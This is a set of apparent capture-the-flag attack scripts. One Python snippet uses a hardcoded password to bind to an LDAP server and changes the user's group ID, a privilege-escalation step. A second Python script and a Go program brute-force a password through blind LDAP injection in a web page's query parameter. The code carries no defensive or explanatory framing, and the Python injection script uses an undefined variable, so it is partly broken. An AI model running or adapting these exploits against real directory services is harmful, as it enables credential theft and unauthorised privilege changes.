File: ldap/thing.py
#!/usr/bin/env python3

##
##

import ldap3

server = ldap3.Server("ldaps://ldap.nope.edu", port=636, use_ssl=True)
connection = ldap3.Connection(
	server,
	"uid=dancer.jones,ou=Users,dc=nope,dc=edu",
	"defaultPASS",
	auto_bind=True,
)
connection.modify(
	"uid=dancer.jones,ou=Users,dc=nope,dc=edu",
	{"gidNumber": [(ldap3.MODIFY_REPLACE, ["27"])]},
)

##
##


import urllib.parse
import argparse,requests
import os,sys,re

def main():
    charset_path = "/var/share/seclists/Fuzzing/alphanum-case-extra.txt"
    base_url = "http://things.things.edu/users/people.php?name=*)(%26(objectClass=user)(description={found_char}{FUZZ}*)"
    found_chars = ""
    skip_count = 6
    if_star = True
	
    with open(charset_path, 'r') as file:
        for char in file:
            char = char.strip()
            ####
            char_encoded = urllib.parse.quote(char)

            # Check if '*' is found and skip the first 6 '*' characters
            if '*' in char and skip_count > 0:
                skip_count -= 1
                continue
            ####

            if '*' in char and add_star:
                found_chars += char
                print(f"[+] Found Password: {found_chars}")
                if_star = False
                continue
            modified_url = base_url.replace("{FUZZ}", char_encoded).replace("{found_char}", found_chars)
            response = requests.get(modified_url)
            if "technician" in response.text and response.status_code == 200:
                found_chars += char
                print(f"[+] Found Password: {found_chars}")
                file.seek(0, 0)
		    
if __name__ == "__main__":
    main()

##
##

File: xml/htb/thing_.go
package main

import (
	"bufio"
	"fmt"
	"io/ioutil"
	"net/http"
	"os"
	"strings"
)

//
//
//

func main() {
	// Prompt user for wordlist input
	fmt.Print("Enter the wordlist or charset (press Enter to use the default): ")
	scanner := bufio.NewScanner(os.Stdin)
	scanner.Scan()
	charsetPath := strings.TrimSpace(scanner.Text())

	// Use default wordlist if user didn't provide one
	if charsetPath == "" {
		charsetPath = "/usr/share/seclists/Fuzzing/alphanum-case-extra.txt"
	}

	baseURL := "http://intranet.things.edu/users/list.php?name=*)(%26(objectClass=user)(description={found_char}{FUZZ}*)"
	foundChars := ""

	file, err := os.Open(charsetPath)
	if err != nil {
		fmt.Println("Error opening charset file:", err)
		return
	}
	defer file.Close()

	scanner = bufio.NewScanner(file)
	for scanner.Scan() {
		char := strings.TrimSpace(scanner.Text())
		//fmt.Println("Trying character:", char)
		//thisisthat := "OnlyWorkingInput:"
		
		modifiedURL := strings.Replace(baseURL, "{FUZZ}", char, 1)
		modifiedURL = strings.Replace(modifiedURL, "{found_char}", foundChars, 1)
		fmt.Println("Modified URL:", modifiedURL)
		//fmt.Println(thisisthat,"{found_char}",foundChars, 1)
		
		response, err := http.Get(modifiedURL)
		if err != nil {
			fmt.Println("Error making HTTP request:", err)
			return
		}
		defer response.Body.Close()

		body, err := ioutil.ReadAll(response.Body)
		if err != nil {
			fmt.Println("Error reading response body:", err)
			return
		}

		if strings.Contains(response.Status, "200 OK") && strings.Contains(string(body), "technician") {
			fmt.Println("Found character:", char)
			foundChars += char
			file.Seek(0, 0) // Move the file pointer to the beginning for another iteration
		}
	}

	if err := scanner.Err(); err != nil {
		fmt.Println("Error reading charset file:", err)
		return
	}

	fmt.Println("Final found characters:", foundChars)
}

//
//
//
